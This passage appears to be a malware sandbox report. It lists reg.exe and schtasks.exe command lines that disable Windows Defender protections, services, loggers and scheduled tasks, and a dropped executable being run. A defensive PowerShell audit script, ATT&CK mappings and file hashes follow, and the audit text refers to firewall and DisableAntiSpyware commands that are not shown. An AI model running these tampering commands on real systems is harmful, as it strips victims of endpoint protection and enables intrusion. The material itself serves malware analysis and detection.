- Modifies Windows Defender Real-time Protection settings
PID: 788

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- Modifies Windows Defender Real-time Protection settings
PID: 4056

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
PID: 824

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
PID: 2844

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
PID: 876

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
PID: 4440

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
PID: 3668

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
PID: 4348

C:\Windows\system32\schtasks.exe (depth 5)
cmdline: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
PID: 3908

C:\Windows\system32\schtasks.exe (depth 5)
cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
PID: 4612

C:\Windows\system32\schtasks.exe (depth 5)
cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
PID: 404

C:\Windows\system32\schtasks.exe (depth 5)
cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
PID: 3400

C:\Windows\system32\schtasks.exe (depth 5)
cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
PID: 4904

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
PID: 3040

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
PID: 3528

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
PID: 876

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
PID: 3984

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
PID: 2340

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
- Modifies Security services
PID: 3920

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
- Modifies Security services
PID: 4188

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
- Modifies Security services
PID: 3904

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
- Modifies Security services
PID: 4428

C:\Windows\system32\reg.exe (depth 5)
cmdline: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- Modifies security service
PID: 1676

C:\Windows\system32\cmd.exe (depth 2)
cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
- Suspicious use of WriteProcessMemory
PID: 4016
  C:\Users\Admin\AppData\Roaming\x69install.exe (depth 3)
  cmdline: C:\Users\Admin\AppData\Roaming\x69install.exe
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 3136

C:\Windows\system32\taskmgr.exe (depth 2)
cmdline: "C:\Windows\system32\taskmgr.exe" /4
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID: 2764

C:\Windows\system32\svchost.exe (depth 1)
cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
PID: 3560

C:\Windows\system32\DllHost.exe (depth 1)
cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID: 3740

C:\Windows\System32\RuntimeBroker.exe (depth 1)
cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
- Modifies registry class
PID: 3892

C:\Windows\System32\RuntimeBroker.exe (depth 1)
cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
PID: 4108

C:\Windows\System32\svchost.exe (depth 1)
cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p
PID: 4596

C:\Windows\System32\svchost.exe (depth 1)
cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
PID: 1040

C:\Windows\system32\svchost.exe (depth 1)
cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- Modifies data under HKEY_USERS
PID: 4704

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (depth 1)
cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID: 1720

C:\Windows\system32\SppExtComObj.exe (depth 1)
cmdline: C:\Windows\system32\SppExtComObj.exe -Embedding
PID: 3960

C:\Windows\System32\svchost.exe (depth 1)
cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
PID: 628

C:\Windows\system32\svchost.exe (depth 1)
cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
PID: 332

C:\Windows\system32\DllHost.exe (depth 1)
cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID: 3404

C:\Windows\system32\svchost.exe (depth 1)
cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
PID: 3128

C:\Windows\system32\svchost.exe (depth 1)
cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
PID: 2532

C:\Windows\system32\svchost.exe (depth 1)
cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
PID: 640

C:\Windows\System32\RuntimeBroker.exe (depth 1)
cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
PID: 2856

C:\Windows\System32\RuntimeBroker.exe (depth 1)
cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
- Modifies registry class
PID: 4864

C:\Windows\system32\wbem\wmiprvse.exe (depth 1)
cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID: 3568

C:\Windows\system32\svchost.exe (depth 1)
cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
PID: 1576

C:\Windows\system32\svchost.exe (depth 1)
cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
PID: 2256

C:\Windows\system32\backgroundTaskHost.exe (depth 1)
cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
PID: 1356

C:\Windows\servicing\TrustedInstaller.exe (depth 1)
cmdline: C:\Windows\servicing\TrustedInstaller.exe
PID: 2688

C:\Windows\system32\svchost.exe (depth 1)
cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
PID: 1948

C:\Windows\System32\mousocoreworker.exe (depth 1)
cmdline: C:\Windows\System32\mousocoreworker.exe -Embedding
- Checks processor information in registry
- Enumerates system info in registry
PID: 4800

C:\Windows\System32\RuntimeBroker.exe (depth 1)
cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
PID: 4904

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe (depth 1)
cmdline: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
PID: 4580

C:\Windows\system32\backgroundTaskHost.exe (depth 1)
cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
PID: 4472

C:\Windows\system32\BackgroundTransferHost.exe (depth 1)
cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
PID: 3572
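The depth-5 children above are a complete checklist of what this sample does to Windows Defender and the firewall: Set-MpPreference switches, policy values under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender, ETW autologgers, Defender maintenance tasks, the Defender service and driver start types, the Security Health tray autostart and the EPP context-menu handlers, plus netsh turning every firewall profile off. The script below is an added example and is not part of the sandbox report or of the sample; it audits a host for each of those settings and returns one line per item that still carries the attacker's value. It assumes Windows 10/11 with the Defender, ScheduledTasks and NetSecurity modules available and an elevated session; the function name Invoke-DefenderTamperingAudit is my own.

```powershell
# Added example, not part of the sandbox report. Audits a host for the exact
# Defender / firewall tampering recorded in the process tree above.
# Assumes Windows 10/11 with the Defender, ScheduledTasks and NetSecurity modules.
#Requires -RunAsAdministrator

function Invoke-DefenderTamperingAudit {
    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Set-MpPreference values the sample changed (value it set is in the message).
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($null -eq $pref) {
        $findings.Add('Get-MpPreference failed: WinDefend service unavailable or disabled')
    } else {
        foreach ($n in 'DisableArchiveScanning', 'DisableIntrusionPreventionSystem',
                       'DisableScriptScanning', 'SignatureDisableUpdateOnStartupWithoutEngine') {
            if ($pref.$n) { $findings.Add("MpPreference $n = True") }
        }
        if ($pref.MAPSReporting -eq 0)        { $findings.Add('MpPreference MAPSReporting = 0 (cloud protection off)') }
        if ($pref.SubmitSamplesConsent -eq 2) { $findings.Add('MpPreference SubmitSamplesConsent = 2 (never send)') }
        foreach ($lvl in 'Low', 'Moderate', 'High', 'Severe') {
            # ThreatDefaultAction 6 = Allow: detections are logged but not remediated.
            if ($pref."${lvl}ThreatDefaultAction" -eq 6) {
                $findings.Add("MpPreference ${lvl}ThreatDefaultAction = 6 (Allow)")
            }
        }
    }

    # 2. Policy and ETW autologger values written with reg.exe.
    $pol = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $wmi = 'HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger'
    $regChecks = @(
        @{ Key = $pol;                        Name = 'DisableAntiSpyware';           Bad = 1 },
        @{ Key = $pol;                        Name = 'DisableAntiVirus';             Bad = 1 },
        @{ Key = "$pol\MpEngine";             Name = 'MpEnablePus';                  Bad = 0 },
        @{ Key = "$pol\Real-Time Protection"; Name = 'DisableBehaviorMonitoring';    Bad = 1 },
        @{ Key = "$pol\Real-Time Protection"; Name = 'DisableIOAVProtection';        Bad = 1 },
        @{ Key = "$pol\Real-Time Protection"; Name = 'DisableOnAccessProtection';    Bad = 1 },
        @{ Key = "$pol\Real-Time Protection"; Name = 'DisableRealtimeMonitoring';    Bad = 1 },
        @{ Key = "$pol\Real-Time Protection"; Name = 'DisableScanOnRealtimeEnable';  Bad = 1 },
        @{ Key = "$pol\Reporting";            Name = 'DisableEnhancedNotifications'; Bad = 1 },
        @{ Key = "$pol\SpyNet";               Name = 'DisableBlockAtFirstSeen';      Bad = 1 },
        @{ Key = "$pol\SpyNet";               Name = 'SpynetReporting';              Bad = 0 },
        @{ Key = "$pol\SpyNet";               Name = 'SubmitSamplesConsent';         Bad = 2 },
        @{ Key = "$wmi\DefenderApiLogger";    Name = 'Start';                        Bad = 0 },
        @{ Key = "$wmi\DefenderAuditLogger";  Name = 'Start';                        Bad = 0 }
    )
    foreach ($c in $regChecks) {
        $item = Get-ItemProperty -LiteralPath $c.Key -Name $c.Name -ErrorAction SilentlyContinue
        if ($null -ne $item -and $item.($c.Name) -eq $c.Bad) {
            $findings.Add("Registry $($c.Key)\$($c.Name) = $($c.Bad)")
        }
    }

    # 3. Defender services and drivers set to Start=4 (Disabled). Read from the registry
    #    because Get-Service does not list kernel drivers such as WdBoot/WdFilter.
    foreach ($svc in 'WdBoot', 'WdFilter', 'WdNisDrv', 'WdNisSvc', 'WinDefend') {
        $start = (Get-ItemProperty -LiteralPath "HKLM:\SYSTEM\CurrentControlSet\Services\$svc" `
                    -Name Start -ErrorAction SilentlyContinue).Start
        if ($start -eq 4) { $findings.Add("Service $svc Start = 4 (Disabled)") }
    }

    # 4. Maintenance tasks the sample disabled with schtasks /Change /Disable.
    $tasks = @(
        @{ Path = '\Microsoft\Windows\ExploitGuard\';     Name = 'ExploitGuard MDM policy Refresh' },
        @{ Path = '\Microsoft\Windows\Windows Defender\'; Name = 'Windows Defender Cache Maintenance' },
        @{ Path = '\Microsoft\Windows\Windows Defender\'; Name = 'Windows Defender Cleanup' },
        @{ Path = '\Microsoft\Windows\Windows Defender\'; Name = 'Windows Defender Scheduled Scan' },
        @{ Path = '\Microsoft\Windows\Windows Defender\'; Name = 'Windows Defender Verification' }
    )
    foreach ($t in $tasks) {
        $task = Get-ScheduledTask -TaskPath $t.Path -TaskName $t.Name -ErrorAction SilentlyContinue
        if ($task -and $task.State -eq 'Disabled') { $findings.Add("Task $($t.Path)$($t.Name) is Disabled") }
    }

    # 5. Firewall profiles (netsh advfirewall set allprofiles state off).
    foreach ($p in Get-NetFirewallProfile) {
        if ([string]$p.Enabled -eq 'False') { $findings.Add("Firewall profile $($p.Name) is disabled") }
    }

    # 6. Security Health tray autostart and the Defender shell context-menu handler (reg delete).
    $run = Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' `
               -Name SecurityHealth -ErrorAction SilentlyContinue
    if ($null -eq $run) { $findings.Add('Run value SecurityHealth (Security Health tray) is missing') }
    foreach ($cls in '*', 'Directory', 'Drive') {
        # -LiteralPath: the '*' class name must not be treated as a wildcard.
        if (-not (Test-Path -LiteralPath "Registry::HKEY_CLASSES_ROOT\$cls\shellex\ContextMenuHandlers\EPP")) {
            $findings.Add("HKCR\$cls\shellex\ContextMenuHandlers\EPP is missing")
        }
    }
    return $findings
}

$result = Invoke-DefenderTamperingAudit
if ($result.Count -eq 0) { 'No tampering indicators from this report were found.' } else { $result }
```

Two caveats when reading the result. The report only proves these commands were launched, not that each took effect: on a host with Tamper Protection enabled most of the Set-MpPreference and policy changes are rejected, and the second DisableAntiSpyware attempt above wraps the key name in typographic quotes, which reg.exe will not parse as a path. Checking the host state is therefore more reliable than assuming the sandbox's outcome. For detection rather than audit, the same activity surfaces as process-creation events for reg.exe, schtasks.exe and netsh.exe spawned by powershell.exe, and as Microsoft-Windows-Windows Defender/Operational events 5001 (real-time protection disabled) and 5007 (configuration changed).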
Network
MITRE ATT&CK Enterprise v16 (numbers are the report's signature hits per technique)
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (4): Windows Service (4)
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (4): Windows Service (4)
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Impair Defenses (4): Disable or Modify System Firewall (1), Disable or Modify Tools (2)
- Modify Registry (5)
Downloads
Filesize: 31KB
MD5: 7e09f62d9e5df18bab9b0f1398b09bcd
SHA1: f056b21813ed260d4e9c489849373c1caf4e590a
SHA256: d710adeb5ba5d9416e9c29d5ac2af11c6ce42b3217f566c25c6a13267a7fa6ad
SHA512: 07cb9b240211316801649d23200b39a8e607717ba90836226bc5c50af1889d48dcbb5cc22db1e782d341f656cc1649925f368a05de5c205478ce6c329dd5939b

Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize: 1KB
MD5: bb6a89a9355baba2918bb7c32eca1c94
SHA1: 976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2
SHA256: 192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b
SHA512: efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

Filesize: 1B
MD5: 68b329da9893e34099c7d8ad5cb9c940
SHA1: adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512: be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Filesize: 944B
MD5: cbc4c534fbe66cc13819a167465d406d
SHA1: bb5597208c9c5722cbfb6e931e727c3dcffa6fbd
SHA256: 9e31c06e2a32d0de8e21e8a8718bb608b8911c374cb245588ec8dd81b1b38a4c
SHA512: c230bd5f5a1be2c0416179bd5879095a089807eb680713e93bf2dde4569f42155b9c623fd718ba69dbc9e48e8e750859d6789f8d22d8b05b45ff56cb6b2507f7

Filesize: 944B
MD5: 5fe54cec739665719801cd30e8ea3e1a
SHA1: 34ca5bf59dde5ba40358bfd593ee9841610f4562
SHA256: dd509c76bc069e3838bfcb62baa32c883eb2f4cf5089851f0b46b032a87b7f0e
SHA512: a10f368e5ed43845e32532e1fae13692323fc9a1fb501297215ddf88bb113a4cf84f28bc0ff3947a953d14e32434016764de755d2628230f5faa708cb5b78317

Filesize: 944B
MD5: 1f545274ba19d9199a78f74cd05e8187
SHA1: 4036cf78d3f310af42963c8f16ae27c5922b5dff
SHA256: 3b4780cb2e226f4b05643c0b512960e694f21b35bbbe84d5c5e97628e1f8909c
SHA512: b0f66a6c32cb7f2f96b51c141ffe7df7f4fd61a792e6a3756f54b6d0df6f48d7a3bda23d46ee1e18a22ac995520fb9c4ca1b444d204bdd8f3e4b8651f59adc0d

Filesize: 944B
MD5: 15dde0683cd1ca19785d7262f554ba93
SHA1: d039c577e438546d10ac64837b05da480d06bf69
SHA256: d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512: 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Filesize: 944B
MD5: 54522d22658e4f8f87ecb947b71b8feb
SHA1: 6a6144bdf9c445099f52211b6122a2ecf72b77e9
SHA256: af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a
SHA512: 55f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba

Filesize: 944B
MD5: 22310ad6749d8cc38284aa616efcd100
SHA1: 440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA256: 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA512: 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Filesize: 944B
MD5: d8cb3e9459807e35f02130fad3f9860d
SHA1: 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256: 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512: 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Filesize: 944B
MD5: cae60f0ddddac635da71bba775a2c5b4
SHA1: 386f1a036af61345a7d303d45f5230e2df817477
SHA256: b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA512: 28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

Filesize: 944B
MD5: 47605a4dda32c9dff09a9ca441417339
SHA1: 4f68c895c35b0dc36257fc8251e70b968c560b62
SHA256: e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a
SHA512: b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

Filesize: 944B
MD5: 0b9ebff96ce87bb2948f7decf425a335
SHA1: 3172582f4a97c15d0c5162c547fe81b811de8e74
SHA256: 9e2d1f92a7985c38161bb08726c708271673b6644d66b327b72e5023a53daf2c
SHA512: 4eeaf75114389ca025b6eb589c160f03ddceb2e2c67196f05cdf2da5c946c617816056265a0420dcae13c19781a291ef8c456cd08bca6760bbcdd89a83e96357

Filesize: 944B
MD5: eb1ad317bd25b55b2bbdce8a28a74a94
SHA1: 98a3978be4d10d62e7411946474579ee5bdc5ea6
SHA256: 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512: d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Filesize: 948B
MD5: 47aec0ae6e0dfab5f91c35cd65d2c56a
SHA1: 0bbe13618bdc0c402539cdfca81471aa501f5cad
SHA256: 8f31385012b247db2cc50ecb164208fbbf5f8cdf7bfc951e8c2c8ad5fb04cf0b
SHA512: c4b7184a85c1d594012ba86390e651439d6cae63c76b94432faaaea410e4ef9bc62d88e68adf8f3abbe36e18ef9e4dc46c3e31a0d72089f98a22f04c8b4a8f12

Filesize: 948B
MD5: 721991167161c45d61b03e4dbad4984b
SHA1: fd3fa85d142b5e8d4906d3e5bfe10c5347958457
SHA256: 0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb
SHA512: f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

Filesize: 948B
MD5: c1a54dd5a1ab44cc4c4afd42f291c863
SHA1: b77043ab3582680fc96192e9d333a6be0ae0f69d
SHA256: c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75
SHA512: 010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

Filesize: 944B
MD5: 2ad33642f863ae14ee53bc6853ee330e
SHA1: ca81cc7d8c33a46ebe97bc1d3db55e41a813029e
SHA256: 17c7b3c895766071a0d87318ec4134a9032ed113b46d3ba75889819a61a9cc19
SHA512: 52c59a7bde3751e07da53f3942c15cc3e19a4bf1929fbc28ae568ed96531852747b4f724e01438e159c4c98bf2d846db205c48e32f4b5984e9fddeb936eb8aa9

Filesize: 944B
MD5: 1542328a8546914b4e2f1aef9cb42bea
SHA1: 7a0ac5969dfb20eb974e8a3bd8707243fa68f94f
SHA256: 7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737
SHA512: b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286

Filesize: 944B
MD5: c2725ae3d241d846de6cbcd661b32aaf
SHA1: 26381f5b9872f011e21da499eb50c467715e23da
SHA256: 35a882b070c9f98c728af00a387afd3b9473d550a661efce9b8b20b4ad0012df
SHA512: 6bcae1738dd58c115d713db3a667d3b027a416928036df8b66e397b35b046c9f86d03411cd088c3c056f744ab1e8ee0d97dd1dc5b1ebf0e3d1ccf367c55ee160

Filesize: 64B
MD5: d8b9a260789a22d72263ef3bb119108c
SHA1: 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256: d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512: 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Filesize: 944B
MD5: bd57ad5950df620de68033dd7fa23e15
SHA1: 78fe6226353d653b066ada933a55e1712b255c8e
SHA256: 8257200487d1bbcbbe82d288574cc19f88700fd7fc157137a8a6dc3bc4c86c6d
SHA512: c4cb884c8c07f09f8547869e033998d874e3c83d47e910be1f9f3113a9be0e9384166f57bab20503a05b942fbbda4bb2107fa43f4e943920acd5ed18b448c73a

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize: 290B
MD5: 7122fc4b76138ccce53216538ac4a368
SHA1: d793320e2b3518783018ca634991ca6f394fd587
SHA256: 57183830001d79f2972797dc68794d057ad242367428e774706f318250538562
SHA512: dc01d18d6402019fde68b1d779f66dae5a684fb710d61716076270d91e1604c2ce67e51045bcf65b093e0fb879df41b0c2cca1b125f09ad162b3b44378dd32d5

Filesize: 1B
MD5: 69691c7bdcc3ce6d5d8a1361f22d04ac
SHA1: c63ae6dd4fc9f9dda66970e827d13f7c73fe841c
SHA256: 08f271887ce94707da822d5263bae19d5519cb3614e0daedc4c7ce5dab7473f1
SHA512: 253405e03b91441a6dd354a9b72e040068b1bfe10e83eb1a64a086c05525d8ccae2bf09130c624af50d55c3522a4fbb7c18cfc8dd843e5f4801d9ad2b5164b12

Filesize: 4KB
MD5: 2df9441936169e60a9631bf730cd4273
SHA1: 979ee79524023a77b9577d077a3472b87fda9834
SHA256: 24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e
SHA512: ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 15KB
MD5: 56b2c3810dba2e939a8bb9fa36d3cf96
SHA1: 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA256: 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA512: 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

Filesize: 68KB
MD5: 143b1a26c0fdda10f74ba1b6249e020a
SHA1: 30a01b28f4f205bc594f8d6665963eaa49d172e3
SHA256: 83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65
SHA512: 06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0

Filesize: 108KB
MD5: 22d6b7ab5c8a05162d36d2981b715c28
SHA1: 7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3
SHA256: f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1
SHA512: 374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce

Filesize: 181KB
MD5: b89953da384c6a80b03e5b3abece33c9
SHA1: 8495ca680bc958f7b1c5525c2e92200fc9fa1864
SHA256: 5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346
SHA512: 8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963

Filesize: 2KB
MD5: 8abf2d6067c6f3191a015f84aa9b6efe
SHA1: 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256: ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
